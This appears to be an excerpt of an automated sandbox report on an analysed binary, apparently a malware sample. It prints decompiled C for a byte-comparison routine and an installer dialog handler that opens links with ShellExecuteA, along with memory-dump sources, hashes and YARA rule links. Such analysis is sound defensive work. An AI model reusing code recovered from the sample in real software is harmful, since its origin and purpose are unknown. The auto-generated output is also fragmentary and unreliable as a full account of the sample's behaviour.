                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10005E95, Relevance: .3, Instructions: 323COMMONCrypto
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E10005E95(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}


































                                            0x10005e95
                                            0x10005e95
                                            0x10005e95
                                            0x10005e9b
                                            0x10005f22
                                            0x10005f24
                                            0x10005f26
                                            0x100062a5
                                            0x100062a5
                                            0x10007096
                                            0x10007096
                                            0x10005f2c
                                            0x10005f32
                                            0x10005fb9
                                            0x10005fbb
                                            0x10005fbd
                                            0x00000000
                                            0x00000000
                                            0x10005fc3
                                            0x10005fc9
                                            0x10006050
                                            0x10006052
                                            0x10006054
                                            0x00000000
                                            0x00000000
                                            0x1000605a
                                            0x10006060
                                            0x100060e7
                                            0x100060e9
                                            0x100060eb
                                            0x00000000
                                            0x00000000
                                            0x100060f7
                                            0x1000617f
                                            0x10006181
                                            0x10006183
                                            0x00000000
                                            0x00000000
                                            0x10006189
                                            0x1000618f
                                            0x10006216
                                            0x10006218
                                            0x1000621a
                                            0x00000000
                                            0x00000000
                                            0x10006220
                                            0x10006226
                                            0x1000629d
                                            0x1000629f
                                            0x100062a1
                                            0x100062a3
                                            0x100062a3
                                            0x00000000
                                            0x100062a1
                                            0x1000622f
                                            0x10006231
                                            0x10006245
                                            0x1000624d
                                            0x1000624f
                                            0x10006263
                                            0x1000626b
                                            0x1000626d
                                            0x10006281
                                            0x10006289
                                            0x1000628b
                                            0x10006294
                                            0x10006294
                                            0x00000000
                                            0x1000628b
                                            0x10006276
                                            0x1000627f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000627f
                                            0x10006258
                                            0x10006261
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006261
                                            0x1000623a
                                            0x10006243
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006243
                                            0x1000619c
                                            0x1000619e
                                            0x100061b6
                                            0x100061be
                                            0x100061c0
                                            0x100061d8
                                            0x100061e0
                                            0x100061e2
                                            0x100061fa
                                            0x10006202
                                            0x10006204
                                            0x1000620d
                                            0x1000620d
                                            0x00000000
                                            0x10006204
                                            0x100061eb
                                            0x100061f4
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100061f4
                                            0x100061c9
                                            0x100061d2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100061d2
                                            0x100061a7
                                            0x100061b0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100061b0
                                            0x10006105
                                            0x10006107
                                            0x1000611f
                                            0x10006127
                                            0x10006129
                                            0x10006141
                                            0x10006149
                                            0x1000614b
                                            0x10006163
                                            0x1000616b
                                            0x1000616d
                                            0x10006176
                                            0x10006176
                                            0x00000000
                                            0x1000616d
                                            0x10006154
                                            0x1000615d
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000615d
                                            0x10006132
                                            0x1000613b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000613b
                                            0x10006110
                                            0x10006119
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006119
                                            0x1000606d
                                            0x1000606f
                                            0x10006087
                                            0x1000608f
                                            0x10006091
                                            0x100060a9
                                            0x100060b1
                                            0x100060b3
                                            0x100060cb
                                            0x100060d3
                                            0x100060d5
                                            0x100060de
                                            0x100060de
                                            0x00000000
                                            0x100060d5
                                            0x100060bc
                                            0x100060c5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100060c5
                                            0x1000609a
                                            0x100060a3
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x100060a3
                                            0x10006078
                                            0x10006081
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10006081
                                            0x10005fd6
                                            0x10005fd8
                                            0x10005ff0
                                            0x10005ff8
                                            0x10005ffa
                                            0x10006012
                                            0x1000601a
                                            0x1000601c
                                            0x10006034
                                            0x1000603c
                                            0x1000603e
                                            0x10006047
                                            0x10006047
                                            0x00000000
                                            0x1000603e
                                            0x10006025
                                            0x1000602e
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000602e
                                            0x10006003
                                            0x1000600c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x1000600c
                                            0x10005fe1
                                            0x10005fea
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005fea
                                            0x10005f3f
                                            0x10005f41
                                            0x10005f59
                                            0x10005f61
                                            0x10005f63
                                            0x10005f7b
                                            0x10005f83
                                            0x10005f85
                                            0x10005f9d
                                            0x10005fa5
                                            0x10005fa7
                                            0x10005fb0
                                            0x10005fb0
                                            0x00000000
                                            0x10005fa7
                                            0x10005f8e
                                            0x10005f97
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005f97
                                            0x10005f6c
                                            0x10005f75
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005f75
                                            0x10005f4a
                                            0x10005f53
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005f53
                                            0x10005ea8
                                            0x10005eaa
                                            0x10005ec2
                                            0x10005eca
                                            0x10005ecc
                                            0x10005ee4
                                            0x10005eec
                                            0x10005eee
                                            0x10005f06
                                            0x10005f0e
                                            0x10005f10
                                            0x10005f19
                                            0x10005f19
                                            0x00000000
                                            0x10005f10
                                            0x10005ef7
                                            0x10005f00
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005f00
                                            0x10005ed5
                                            0x10005ede
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x10005ede
                                            0x10005eb3
                                            0x10005ebc
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction ID: 9cc47b3e4207d1c9c5e7bb75d3240e0f2996182cd367a8d02e758e9a829ee964
                                            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                            • Instruction Fuzzy Hash: ACC172722155930AFF4DC679C83413FBAE2AB966F132B176DD4B2CB1C9EE24C524D620
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A9E5, Relevance: .2, Instructions: 227COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5293296d014792587c706e37fcf044dce698dfff6e30ee3ee6989ff02b958863
                                            • Instruction ID: 99c4f2a2031ce123b29a1b8f6f93d6339598118fda98ccda501ab601ec6de06b
                                            • Opcode Fuzzy Hash: 5293296d014792587c706e37fcf044dce698dfff6e30ee3ee6989ff02b958863
                                            • Instruction Fuzzy Hash: 9FB1125585D2EDADDB06CBF941643FDBFB05E26102F0841CAE4E5E6283C43A938EDB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A9F4, Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 556826cc9d0fc269208a3416c678c218f41ce2427c26daa7b9936f0869e52dbb
                                            • Instruction ID: 0aafcfe09f8af5d77c87e1b1d222ca6024ad1592f41e8b48fb2c36ff6c638824
                                            • Opcode Fuzzy Hash: 556826cc9d0fc269208a3416c678c218f41ce2427c26daa7b9936f0869e52dbb
                                            • Instruction Fuzzy Hash: A4A1035585D2EDADDB06CBF941643FCBFB05E26102F0845CAE0E5E6283C43A938EDB21
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A616, Relevance: .1, Instructions: 61COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                            • Instruction ID: a5f5cc404345051d9a3d43732892c5c43a2385a91314192d1658d7f645f45817
                                            • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                            • Instruction Fuzzy Hash: 0111C272A10209AFCB10DBAAD8888AEF7FDEF466D4B5540A5F804DB214E774DEC0C660
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A706, Relevance: .0, Instructions: 26COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                            • Instruction ID: f4d788da18cf8e267c38a3c1811d86f470bc5a631a0a0da5908c50b93dabbf40
                                            • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                            • Instruction Fuzzy Hash: FAE092357645049FCB44CBA8CC41D55B3F4EB09230B114290FC15CB3E0EA34FE80D650
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A744, Relevance: .0, Instructions: 23COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction ID: 2df1a6d1e3cca68c9d16f3148c796fc1ccc26e8a365bcac769081ee74b5b76f8
                                            • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                            • Instruction Fuzzy Hash: 47E08C3A7146508BC360DB59C980942F3F9FB8A2F072A486AEC89DB751C230FD808A90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1001A6C7, Relevance: .0, Instructions: 7COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                            • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                            • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403F9C, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 93%
                                            			E00403F9C(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x420518 =  *0x420518 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EBB(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x422ee0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								_t40 =  &_v8; // 0x422ee0
								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x423f48, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x423f48, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x420518 != 0) {
						goto L25;
					} else {
						_t112 =  *0x41fd08 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403E76(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404227();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42371c; // 0x666dd3
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x423f78; // 0x6656e0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F68;
				E00403E54(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E54(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403E76( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403E89(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x423f50; // 0x661638
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f4fc =  *0x41f4fc & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420518 =  *0x420518 & 0x00000000;
				return 0;
			}




















                                            0x00403fac
                                            0x004040d2
                                            0x0040412e
                                            0x00404132
                                            0x00404209
                                            0x0040420b
                                            0x0040420b
                                            0x00404211
                                            0x00404211
                                            0x00404214
                                            0x00000000
                                            0x0040421b
                                            0x00404140
                                            0x00404142
                                            0x0040414c
                                            0x00404157
                                            0x0040415a
                                            0x0040415d
                                            0x00404168
                                            0x0040416b
                                            0x00404172
                                            0x00404180
                                            0x00404198
                                            0x004041a0
                                            0x004041ab
                                            0x004041bb
                                            0x004041bd
                                            0x004041bd
                                            0x00404172
                                            0x004041c7
                                            0x00000000
                                            0x004041d2
                                            0x004041d6
                                            0x004041e7
                                            0x004041e7
                                            0x004041ed
                                            0x004041fb
                                            0x004041fb
                                            0x00000000
                                            0x004041ff
                                            0x004041c7
                                            0x004040dd
                                            0x00000000
                                            0x004040f1
                                            0x004040f7
                                            0x004040fd
                                            0x00000000
                                            0x00000000
                                            0x00404122
                                            0x00404124
                                            0x00404129
                                            0x00000000
                                            0x00404129
                                            0x004040dd
                                            0x00403fb2
                                            0x00403fb5
                                            0x00403fba
                                            0x00403fbc
                                            0x00403fcb
                                            0x00403fcb
                                            0x00403fcd
                                            0x00403fd2
                                            0x00403fd5
                                            0x00403fd7
                                            0x00403fdc
                                            0x00403fe5
                                            0x00403feb
                                            0x00403ff7
                                            0x00403ffa
                                            0x00404003
                                            0x00404008
                                            0x0040400b
                                            0x00404010
                                            0x00404027
                                            0x0040402e
                                            0x00404041
                                            0x00404044
                                            0x00404059
                                            0x0040405b
                                            0x00404060
                                            0x00404065
                                            0x0040406a
                                            0x0040406a
                                            0x00404079
                                            0x00404088
                                            0x0040408a
                                            0x004040a0
                                            0x004040af
                                            0x004040b1
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                            • String ID: N$open$.B
                                            • API String ID: 3615053054-720656042
                                            • Opcode ID: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                            • Instruction ID: d52f05746bbb3f3b1d606d9c91532631e65720296560e4ea5c31ec00add49965
                                            • Opcode Fuzzy Hash: 1798247d7b7fc50258c29a0d8842d8596947dcfb78ae24f73fc7e5e40567b794
                                            • Instruction Fuzzy Hash: 0161D571A40309BBEB109F60DD45F6A7B69FB54715F108036FB04BA2D1C7B8AA51CF98
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10003510, Relevance: 33.3, APIs: 22, Instructions: 280fileCOMMON
                                            Download Yara Rule
                                            APIs
